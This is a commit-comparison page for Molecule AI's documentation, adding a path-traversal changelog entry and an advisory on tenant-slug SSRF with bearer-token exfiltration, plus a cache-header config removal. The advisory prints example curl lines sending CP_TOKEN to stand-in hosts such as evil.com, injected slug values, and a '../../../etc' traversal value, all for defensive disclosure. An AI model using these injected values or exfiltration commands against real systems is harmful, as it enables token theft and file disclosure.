Compare commits
3 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 app-lead
|
8c49c7ce2d | ||
|
app-lead
|
d7a9ee3504 | ||
 technical-writer
|
6971ef23aa |
@@ -9,6 +9,26 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
|
||||
|
||||
---
|
||||
|
||||
## 2026-05-13 — CWE-22: Path Traversal Regression in `org_import.go`
|
||||
|
||||
**Severity:** High (CWE-22)
|
||||
**PR:** [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pull/810)
|
||||
**Affected:** `org_import.go` — `createWorkspaceTree`
|
||||
|
||||
### Vulnerability
|
||||
|
||||
A regression removed the `resolveInsideRoot` path-traversal guard from `createWorkspaceTree`. A malicious org YAML with `filesDir: "../../../etc"` could read arbitrary server files through the org template import path.
|
||||
|
||||
### Fix
|
||||
|
||||
Replaced unprotected `parseEnvFile` calls with `loadWorkspaceEnv` which applies `resolveInsideRoot` validation before accessing any path.
|
||||
|
||||
### User-facing summary
|
||||
|
||||
Org template imports now correctly validate all file paths before accessing them. Attempts to traverse outside the workspace root are rejected.
|
||||
|
||||
---
|
||||
|
||||
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
|
||||
|
||||
**Severity:** High (CWE-22)
|
||||
|
||||
@@ -5,5 +5,7 @@ description: Security guides, advisories, and coverage reports for the Molecule
|
||||
|
||||
## In this section
|
||||
|
||||
- [OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)](/docs/security/offsec-006-slug-ssrf-advisory) —
|
||||
HIGH severity — SSRF and bearer-token exfiltration via unsanitised tenant slug in self-hosted deployment scripts
|
||||
- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
|
||||
Three HIGH-severity findings for self-hosted operators
|
||||
|
||||
@@ -0,0 +1,79 @@
|
||||
---
|
||||
title: "OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)"
|
||||
description: High-severity SSRF and bearer-token exfiltration via unsanitised tenant slug interpolation in self-hosted deployment scripts.
|
||||
---
|
||||
|
||||
## Advisory overview
|
||||
|
||||
**Severity:** HIGH
|
||||
**CWE:** [CWE-918](https://cwe.mitre.org/data/definitions/918.html) (SSRF) + [CWE-20](https://cwe.mitre.edu/data/definitions/20.html) (Improper Input Validation)
|
||||
**Affected file:** `scripts/promote-tenant-image.sh`
|
||||
**Affected versions:** All self-hosted deployments prior to the fix in `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
|
||||
**Fixed in:** `molecule-core` #933 (2026-05-14)
|
||||
**SaaS impact:** None — the platform applies the fix server-side
|
||||
|
||||
This advisory documents a high-severity Server-Side Request Forgery (SSRF) and bearer-token exfiltration vulnerability in the tenant promotion script used by self-hosted operators.
|
||||
|
||||
---
|
||||
|
||||
## Vulnerability details
|
||||
|
||||
Tenant slugs were interpolated directly into URL paths and ECR repository identifiers without any sanitisation.
|
||||
|
||||
### Affected code pattern
|
||||
|
||||
```bash
|
||||
# Vulnerable — slug inserted into URL path unchecked
|
||||
SLUG="?url=https://attacker.com"
|
||||
curl "${PLATFORM_URL}/cp_redeploy_tenant/${SLUG}" # SSRF
|
||||
curl "?url=https://evil.com&token=${CP_TOKEN}" # Token exfiltration
|
||||
```
|
||||
|
||||
A malicious tenant slug such as `?url=https://attacker.com&token=$CP_TOKEN` passed to `promote-tenant-image.sh` could cause the platform to:
|
||||
|
||||
1. **SSRF** — redirect HTTP calls to an attacker-controlled host by injecting a URL parameter
|
||||
2. **Bearer-token exfiltration** — the platform's `CP_TOKEN` appears in the attacker's server access logs via the same URL parameter injection
|
||||
|
||||
### Secondary attack: glob expansion
|
||||
|
||||
Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
|
||||
|
||||
---
|
||||
|
||||
## Recommended mitigations
|
||||
|
||||
### Upgrade (self-hosted operators)
|
||||
|
||||
If you are running a self-hosted control plane, upgrade to the latest `molecule-core` build that includes `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933).
|
||||
|
||||
After upgrading, tenant slugs are validated against RFC-1123 before any network call:
|
||||
|
||||
```bash
|
||||
# Invalid slugs are rejected with exit code 64
|
||||
$ ./promote-tenant-image.sh "?url=https://evil.com"
|
||||
Error: invalid tenant slug "?url=https://evil.com" — must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
|
||||
```
|
||||
|
||||
### If you cannot upgrade immediately
|
||||
|
||||
Audit your tenant slugs manually. Any slug containing the characters `?`, `#`, `&`, `$`, `/`, `\`, or spaces is a potential exploit vector. Rename affected tenants with clean slugs matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`.
|
||||
|
||||
---
|
||||
|
||||
## Fix summary
|
||||
|
||||
Fix adds `validate_slug()` (new function) — RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`), exits with code 64 on invalid slugs before any network call.
|
||||
|
||||
---
|
||||
|
||||
## Credit
|
||||
|
||||
Found and fixed by the Molecule AI security team during internal code review.
|
||||
|
||||
---
|
||||
|
||||
## Related advisories
|
||||
|
||||
- [SAFE-MCP Security Advisory](./safe-mcp-advisory.mdx) — April 2026 audit findings (G-01 through G-03)
|
||||
- [Security Changelog](./changelog.md) — full history of security fixes
|
||||
- [OWASP Agentic Top 10](./owasp-agentic-top-10.mdx) — risk framework reference
|
||||
@@ -2,33 +2,9 @@ import { createMDX } from 'fumadocs-mdx/next';
|
||||
|
||||
const withMDX = createMDX();
|
||||
|
||||
// HTML pages: short edge cache + long stale-while-revalidate. Lets Vercel Edge
|
||||
// serve repeat navigations from cache (~5 min fresh, 24 h stale-while-revalidate
|
||||
// in the background) while keeping the browser revalidating on every nav. The
|
||||
// negative lookahead leaves Next.js's own _next/static (immutable, hash-named)
|
||||
// and _next/image cache headers untouched.
|
||||
const HTML_CACHE_CONTROL =
|
||||
'public, max-age=0, s-maxage=300, stale-while-revalidate=86400';
|
||||
|
||||
/** @type {import('next').NextConfig} */
|
||||
const config = {
|
||||
reactStrictMode: true,
|
||||
async headers() {
|
||||
return [
|
||||
{
|
||||
// Match every path except Next.js internals and API routes — those
|
||||
// already have correct cache headers (immutable for hashed assets,
|
||||
// app-controlled for /api).
|
||||
source: '/((?!_next/static|_next/image|api/).*)',
|
||||
headers: [
|
||||
{
|
||||
key: 'Cache-Control',
|
||||
value: HTML_CACHE_CONTROL,
|
||||
},
|
||||
],
|
||||
},
|
||||
];
|
||||
},
|
||||
};
|
||||
|
||||
export default withMDX(config);
|
||||
|
||||
Reference in New Issue
Block a user